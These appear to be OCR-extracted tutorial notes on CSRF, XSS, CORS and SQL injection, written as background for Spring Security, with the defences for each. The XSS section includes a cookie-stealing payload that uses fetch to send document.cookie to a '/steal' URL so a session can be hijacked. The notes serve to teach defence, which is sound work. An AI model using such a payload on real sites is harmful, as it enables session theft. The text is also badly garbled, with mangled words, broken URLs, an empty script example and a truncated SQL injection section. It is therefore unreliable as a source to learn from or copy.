Before we start Spring Security ets understand what are some common attacks + User's already authenticated toa ste. + CSRF attack tricks a browser into making unwanted request toa site where user is already authenticated, + Applicable where state and session is managed, In below demo, made authentication mandatory forall endpoints but also using session stateful) based authenticationStepl: make user Authenticated on a server Please sign in‘tep2: send some maicouslnkto this user, whois authenticated Click Below to Claim Your Reward! ‘As soon as user clicked on “claim my Money" button, an unwanted operation i executed and browser appenés the Cookes Session t00How to get protected from CSRF attack: - By using CSRF Token, this ensures that request originates from the legitimate source. As authenticate forms or website only append the CSRF token in the request. Which server can used to validate with the token created atthe time of HTTP Session creation. 2. XSS (Cross-Ste Scriting) + Itallows attacker to put malicious script into web page viewed by other users. + Like comments section page. * Commonly used for stealing the session or deform the website.For demo purpose, | am creating * GET "/ss" endpoint, which loads all the comments. It returns "xss, since t's @ controler class (not RestControlle) so, by-default it wll try to look for "xss htm" file and try to render it. + POST */comment® endpoint, which is not sanitizing any user input and simply stores this ‘comment say in 08 and then displays it during GET call. So, if attacker put malicious script using this POST request, then during every GET call, this script will run forall the users who will make a call Secrainesouceemptesis€ > © lecahostsos0jsstontinvs Leave a Comment Now, if insert "" and click submit, this script will get stored say in DB, and when GET apis invoked, it fetched this malicious comment from DB and returned in response and browser executed it.Now assume, what if| added: fetch{http:/localhost:8080/steal?cookt * + document.cookie); ‘Then any user, loads this comment section page, that’s user Cookie willbe sent to attacker ud, ‘And this cookie only hold JSESSIONID, which attacker can use it to perform unwanted ‘operations on their active sessions. How to get protected from XSS attack: = By proper escaping user input (converting special character lke < to 8) + By properly validating data before rendering. 3. CORS (Cross-Origin Resource Sharing) + Its not an attack but more ofa security feature that restrict web pages from makingrequest to different origin, unless allowed by the server Different origin = protocol + domain + port For example: serv tre [htto:)/localhost:8080 facalhast:BO80 Different protocol, so its considered as different origin and by-default if client tries to call the server, CORS will block this. ‘SERVER has to allow the request from "hitps://localhost:8080" Simiary: tient: Server: httnsu/ocalhost;4090 bitnssocalnostsloan Client: Server: httass/ local ‘So, whenever there is a call between different origi, server has to allow: + By setting “Access-Cont ‘and other header to allow the cross-origin request.* In this attacker, manipulates SQL query by inserting malicious input into the user fieldHow to get protected from SAIL Injection attack: - By parameterized Query